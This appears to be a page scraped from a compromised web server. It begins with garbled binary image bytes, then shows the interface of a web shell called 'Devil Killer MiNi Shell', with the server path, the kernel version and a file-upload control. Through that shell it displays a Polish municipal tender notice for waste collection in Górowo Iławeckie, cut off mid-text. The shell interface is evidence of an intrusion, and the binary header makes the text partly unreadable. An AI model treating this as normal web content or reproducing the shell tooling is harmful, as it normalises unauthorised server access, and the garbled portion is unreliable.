JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240904/0048387201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Odbiór i transport odpadów komunalnych od właścicieli nieruchomości zamieszkałych z terenu Gminy Miejskiej Górowo Iławeckie w 2025 roku” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIEJSKA GÓROWO IŁAWECKIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510743491</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">pl. Ratuszowy 18</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Górowo Iławeckie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">11-220</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">897627020</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">897627044</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">umgorowo@gorowoilaweckie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://gorowoil-um.bip-wm.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Odbiór i transport odpadów komunalnych od właścicieli nieruchomości zamieszkałych z terenu Gminy Miejskiej Górowo Iławeckie w 2025 roku” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8b893171-0b70-48a1-9590-a11278229b19</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00483872</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-09-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00016824/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Odbiór i transport odpadów komunalnych od właścicieli nieruchomości zamieszkałych z terenu Gminy Miejskiej Górowo Iławeckie w 2025 roku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-8b893171-0b70-48a1-9590-a11278229b19 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Minimalne wymagania techniczne<br/>dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfiki połączenia<br/>określa Regulamin Platformy e-Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1)	Wobec powyższego na podstawie art. 13 ust. 1 i ust. 2 RODO, Zamawiający poniżej informuje <br/>o sposobie i celu, w jakim przetwarzane będą dane osobowe, a także o przysługujących prawach, wynikających z regulacji o ochronie danych osobowych:<br/>a)	Administrator danych osobowych:<br/>Administratorem danych osobowych jest Gmina Miejska Górowo Iławeckie reprezentowana przez Burmistrza Miasta Górowo Iławeckie, ul. Plac Ratuszowy 18, 11-220 Górowo Iławeckie.<br/>b)	Nadzór nad prawidłowym przetwarzaniem danych osobowych:<br/>Zamawiający wyznaczył Inspektora danych osobowych, z którym można kontaktować się we wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem danych osobowych drogą elektroniczną: inspektor@cbi.pl lub pisemnie na adres Administratora danych.<br/>c)	Cele przetwarzania oraz podstawa prawna przetwarzania:<br/>i)	Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. „c” RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na odbiór i transport odpadów komunalnych od właścicieli nieruchomość zamieszkałych i niezamieszkałych z terenu Gminy Miejskiej Górowo Iławeckie w 2019 roku przeprowadzonego w trybie przetargu nieograniczonego oraz w celu archiwizacji dokumentacji zawiązanej z w/w postępowaniem.<br/>ii)	Dane osobowe przetwarzane będą również w celach dowodowych dla zabezpieczenia informacji na wypadek prawnej potrzeby wykazania faktów oraz w celu ewentualnego ustalenia, dochodzenia lub obrony przed roszczeniami,<br/>iii)	Dane osobowe przetwarzane będą w celu realizacji umowy zawartej w sprawie zamówienia publicznego (art. 6 ust. 1 lit. „b” RODO).<br/>d) Kategorie przetwarzania danych:<br/>i)	Dane identyfikujące osobę: imię, nazwisko, PESEL/REGON/NIP, dane dotyczące dokumentów tożsamości, dat urodzenia, miejsce urodzenia, obywatelstwo;<br/>ii)	Dane adresowe i teleadresowe (nr telefonu, faxu, adres e-mail);<br/>iii)	Dane o wykształceniu, doświadczeniu i kwalifikacjach zawodowych;<br/>iv)	Informacje o niekaralności, skazaniu lub naruszeniu prawa;<br/>v)	Inne dane niezbędne do przeprowadzenia postępowania, udzielenia zamówienia publicznego oraz realizacji umowy zawartej w sprawie zamówienia publicznego,</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OGA.271.2.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przedmiotem zamówienia jest usługa odbioru i transportu odpadów komunalnych zmieszanych <br/>i segregowanych od właścicieli nieruchomości zamieszkałych z terenu Miasta Górowo Iławeckie, utworzenie i prowadzenie Punktu Selektywnego Zbierania Odpadów Komunalnych (PSZOK).<br/>Przedmiot zamówienia został podzielony na 3 zadania:<br/>Zadanie nr 1- Odbiór odpadów komunalnych zmieszanych i selektywnie zbieranych <br/>ze wszystkich nieruchomości zamieszkałych z terenu Gminy Miejskiej Górowo Iławeckie i transport ww. odpadów do stacji przeładunkowej w Medynach.<br/>Zadanie nr 2- Utworzenie i prowadzenie Punktu Selektywnego Zbierania Odpadów Komunalnych (PSZOK). <br/>Zadanie nr 3- Zapewnienie właścicielom nieruchomości zamieszkałych wskazanych <br/>przez Zamawiającego worków do selektywnej zbiórki odpadów komunalnych o poj. 120 l. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90533000-2 - Usługi gospodarki odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90511000-2 - Usługi wywozu odpadów</p> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <p class="mb-0">90513100-7 - Usługi wywozu odpadów pochodzących z gospodarstw domowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami:<br/>1.	cena ofertowa 60 %<br/>2.	kryterium ekologiczne-40%<br/>1.	Ocena punktowa kryterium dokonana zostanie z zastosowaniem wzorów do obliczenia punktowego:<br/>Cena (P1) – 90 % oceniana jako:<br/>(P1) = (Cmin/ Cbadana)*100 pkt*60%<br/>gdzie: Cmin - minimalna cena spośród złożonych ofert<br/>Cbadana - cena oferty badanej<br/><br/>Kryterium ekologiczne (P2) – zostaną przyznane w oparciu o złożone przez Wykonawcę oświadczenie (załącznik nr 1 SWZ) dotyczące przeprowadzenia akcji promującej selektywną zbiórkę odpadów <br/>w Przedszkolu Miejskim oraz Szkole Podstawowej klasy I-III<br/>Liczba punktów zostanie przyznana na poniższych zasadach: <br/>1) nie przeprowadzenie akcji - 0 pkt., <br/>2) przeprowadzenie akcji 1 raz - 20 pkt., <br/>3) przeprowadzenie akcji 2 razy- 40 pkt. <br/> <br/>Sposób przyznawania punktów: <br/>1) Wykonawca, który zaoferuje przeprowadzenie akcji promującej selektywną zbiórkę odpadów 2 razy w okresie obowiązywania umowy otrzyma maksymalną liczbę punktów (40 pkt) w niniejszym kryterium, <br/>2) Wykonawca, który zaoferuje przeprowadzenie akcji promującej selektywną zbiórkę odpadów 1 raz w okresie obowiązywania umowy otrzyma 20 punktów, <br/>3) W przypadku, gdy Wykonawca zrezygnuje z przeprowadzenia akcji promującej selektywną zbiórkę odpadów otrzyma 0 punktów<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyskała łącznie największą liczbę punktów wyliczoną wg wzoru:<br/><br/>P= P1-+ P2<br/><br/>P- łączna liczba punktów<br/>P1- liczba punktów uzyskanych w kryterium cena<br/>P2- liczba punktów uzyskanych w kryterium termin płatności faktury<br/>Spośród ofert, które nie zostaną odrzucone Zamawiający wybierze ofertę najkorzystniejszą, tzn. taką, która za kryteria uzyska najwyższą ilość punktów.<br/>Jeżeli w niniejszym postępowaniu nie będzie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że zostały złożone oferty o takiej samej cenie, Zamawiający wezwie Wykonawców, którzy złożyli te oferty do złożenia w terminie przez siebie określonym ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kryterium ekologiczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>a) nie podlegają wykluczeniu,<br/>b) spełniają warunki udziału w postępowaniu, które zostały określone przez Zamawiającego<br/>w ogłoszeniu o zamówieniu i specyfikacji.<br/>2. W postępowaniu o udzielenie zamówienia publicznego mogą wziąć udział Wykonawcy, którzy wykażą:<br/>1. zdolności do występowania w obrocie gospodarczym,<br/>Zamawiający nie stawia wymagań w tym zakresie.<br/>2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>a) odpis lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji<br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>b) aktualne zezwolenie na zbieranie odpadów komunalnych oraz odpadów komunalnych niebezpiecznych wydane przez<br/>organ właściwy ze względu na miejsce zbierania odpadów, opisane w art. 41ust. 1 lub art. 232 ust. 1 Ustawy z dnia 14<br/>grudnia 2012 r. o odpadach (tj. Dz. U. z 2023 r. poz. 1587 ze zm.),<br/>b) wpis do rejestru, o którym mowa w art. 49 ust. 7 ust. 1 Ustawy z 14.12.2012 o odpadach<br/>(tj. Dz.U. z 2023, poz. 1587 z póz. zm.), w zakresie określonym w art. 50 ust. 1 pkt 5 ppkt b;<br/>c) wpis do rejestru podmiotów zbierających zużyty sprzęt elektryczny i elektroniczny, o którym mowa w art. 49 ust. 1 Ustawy<br/>z dnia 14 grudnia 2012 r. o odpadach (Dz. U z 2023 r. poz. 1587 ze zm.), prowadzonego przez Marszałka Województwa lub<br/>przez Głównego Inspektora Ochrony Środowiska, do czasu utworzenia ww. rejestru przez Marszałka Województwa, zgodnie<br/>z art. 235 ust. 2 tej ustawy.<br/>d) posiada wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli<br/>nieruchomości zamieszkałych na terenie Gminy Miejskiej Górowo Iławeckie, prowadzonego przez Burmistrza Górowo<br/>Iławeckie na podstawie art. 9b<br/>i art. 9c Ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach<br/>(tj. Dz.U. z 2024 r. poz. 399 ze zm.).<br/>3. sytuacja ekonomiczna i finansowa<br/>(W przypadku oferty wspólnej warunek zostanie uznany przez zamawiającego za spełniony, jeżeli wykonawcy składający<br/>ofertę wspólną będą spełniać go łącznie).<br/>1. Wymagane jest posiadanie przez wykonawcę odpowiedniego ubezpieczenia odpowiedzialności cywilnej na kwotę 50 000<br/>zł (słownie: pięćdziesiąt tysięcy złotych 00/100).<br/>4. zdolności technicznej lub zawodowej<br/>(W przypadku oferty wspólnej warunek zostanie uznany przez zamawiającego za spełniony, jeżeli wykonawcy składający ofertę wspólną będą spełniać go łącznie).<br/>a) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności gospodarczej jest<br/>krótszy - w tym okresie wykonał lub w przypadku świadczeń okresowych i ciągłych wykonuje usługę lub usługi polegające<br/>na odbiorze i przekazaniu do zagospodarowania lub/i odbiorze i zagospodarowaniu odpadów komunalnych z nieruchomości<br/>w sposób ciągły o łącznej masie odebranych odpadów komunalnych<br/>w ciągu następujących po sobie 12 miesięcy (jeżeli okres działalności jest krótszy to w tym okresie) co najmniej 1000 Mg<br/>wraz z załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie;<br/>b) dysponuje lub będzie dysponował na podstawie zawartej umowy co najmniej:<br/>a. Pojazdem specjalistycznym (śmieciarka), przystosowanym do odbierania zmieszanych odpadów komunalnych<br/>zbieranych w pojemnikach 120l – 1100l, wyposażony w wagę z homologacją (2 szt.)<br/>b. Pojazdem specjalistycznym z dźwigiem hakowym lub bramowym przystosowany do odbioru odpadów zmieszanych<br/>zbieranych w pojemnikach kontenerowych (m.in. typu KP7) (1 szt.)<br/>c. Pojazdem przystosowanym do odbierania selektywnie zebranych odpadów komunalnych (2 szt.).<br/>d. Pojazdem do odbierania odpadów bez funkcji kompaktującej (1 szt.)<br/>e. Bazą magazynowo- transportową spełniającą wymogi opisane w rozporządzeniu Ministra Środowiska z dnia 11 stycznia<br/>2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz.<br/>U. z 2013 r. poz. 122) oraz ustawy o odpadach,<br/>w szczególności art. 25 ust. 6a-6j oraz 7,8 i 8a.(1szt.)<br/>Samochody wymienione w pkt. ba, bb, bc, bd powyżej muszą być trwale i czytelnie oznakowane (nazwa firmy, dane<br/>adresowe i numery telefonów). Wszystkie samochody wymienione powyżej muszą być zarejestrowane, dopuszczone do<br/>ruchu, posiadać aktualne badania techniczne i świadectwa dopuszczenia do ruchu.<br/>4) Zamawiający może, na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli<br/>zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może<br/>mieć negatywny wpływ na realizację zamówienia.<br/>3. Korzystanie z zasobów podmiotu trzeciego<br/>W celu potwierdzenia spełnienia warunków w postępowaniu, wykonawca może polegać na potencjale podmiotu trzeciego na<br/>zasadach opisanych w art. 118-123 ustawy Pzp. Podmiot trzeci, na potencjał którego wykonawca powołuje się w celu<br/>wykazania spełnienia warunków udziału w postępowaniu, nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 oraz<br/>art. 109 ust. 1 pkt 1 ustawy Pzp. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)<br/>Oświadczenie Wykonawcy o spełnieniu warunków udziału w postepowaniu wg załącznika nr 2 do SWZ .<br/>2) Oświadczenie Wykonawcy o niepodleganiu wykluczeniu wg załącznika nr 4 SWZ .<br/>3) Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji,<br/>3) Pisemne zobowiązanie sporządzone wg załącznika nr 11 do SWZ lub inne dokumenty, o których mowa Rozdziale nr 5 ust. 3 o ile<br/>Wykonawca polega na zdolnościach lub sytuacji innych podmiotów (jeżeli dotyczy).<br/>4) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o których mowa powyżej w pkt 1 i 2 składa każdy z wykonawców wspólnie ubiegających się o zamówienie.<br/>5) Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia<br/>wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w<br/>postępowaniu zamieszcza informacje o tych podmiotach w oświadczeniach,<br/>o których mowa powyżej w pkt 1 i 2.<br/>6) Wadium wnoszone w innej formie niż pieniądzu (oryginał dokumentu) wnosi się w takiej formie jakiej zostało ustanowione przez<br/>Gwaranta (wystawcę gwarancji/poręczenia), tj. oryginału dokumentu.<br/>7) Oświadczenie RODO stanowiące załącznik nr 12 SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zaświadczenie właściwego<br/>Naczelnika Urzędu Skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, wystawione nie wcześniej niż<br/>3 miesiące przed upływem terminu składania ofert lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie<br/>z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w<br/>szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w<br/>całości wykonania decyzji właściwego organu.<br/>3) Zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego<br/>Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na<br/>ubezpieczenia społeczne lub zdrowotne, wystawione nie wcześniej niż 3 miesiące przed 